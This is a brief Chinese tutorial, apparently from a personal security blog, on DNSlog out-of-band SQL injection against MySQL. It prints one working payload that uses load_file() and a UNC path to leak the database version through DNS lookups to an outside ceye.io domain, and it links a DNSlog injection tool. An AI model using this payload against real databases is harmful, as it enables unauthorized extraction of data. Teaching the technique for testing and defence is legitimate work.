SQL注入——DNSlog注入

0.前言

  在SQL注入选择布尔注入、时间盲注、注入的效率很低占用线程高还很容易被waf进行拦截，不仅如此，在目标重点没有明显回显的情况下，我们在读取文件、执行命令注入等操作时无法很好的确实是否利用成功，这时候就需要利用到DNSlog注入了。

  前面也就介绍过所谓的DNS就是将域名解释为ip地址，当用户在浏览器输入一个域名A.com时，DNS就会将该域名解析到其所对应的ip地址127.0.0.1中。而DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名baidu.com等的访问信息，类似日志文件一样的东西。如遇到MySql的盲注时，可以利用内置函数load_file()来完成DNSlog。load_file()不仅能够加载本地文件，同时也能对诸如\www.test.com这样的URL发起请求。

  注入语句示范：

select *from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.oi2yec.ceye.io\\abc'))),1,0)#; 

 

  （淦，pycharm的python2版本下不来DNSlog工具的库，解决了一天都没搞定，等有空吧环境放在虚拟机里面运行吧）

1.涉及相关链接网址：

• http://ceye.io
• https://github.com/ADOOO/DnslogSqlinj